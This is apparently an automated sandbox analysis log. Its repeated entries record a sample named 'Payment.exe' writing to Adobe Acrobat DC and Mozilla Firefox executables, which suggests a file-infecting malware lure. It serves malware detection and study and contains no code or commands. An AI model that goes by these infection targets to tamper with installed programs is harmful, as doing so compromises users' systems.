Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
